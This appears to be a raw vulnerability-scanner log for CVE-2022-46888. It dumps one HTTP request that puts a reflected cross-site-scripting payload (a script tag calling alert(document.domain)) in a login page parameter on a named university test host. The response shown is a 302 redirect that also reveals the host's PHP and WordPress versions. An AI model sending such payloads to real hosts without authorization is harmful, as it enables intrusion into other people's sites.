[CVE-2022-46888] Dumped HTTP request for https://paintrainer-uat.app.unimelb.edu.au/login.php?secret="><script>alert(document.domain)</script>


GET /login.php?secret="><script>alert(document.domain)</script> HTTP/1.1
Host: paintrainer-uat.app.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2022-46888] Dumped HTTP response https://paintrainer-uat.app.unimelb.edu.au/login.php?secret="><script>alert(document.domain)</script>

HTTP/1.1 302 Found
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Aug 2025 15:18:07 GMT
Location: https://paintrainer-uat.app.unimelb.edu.au/login-to-paintrainer/
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: PHP/7.4.3
X-Redirect-By: WordPress
Content-Length: 0


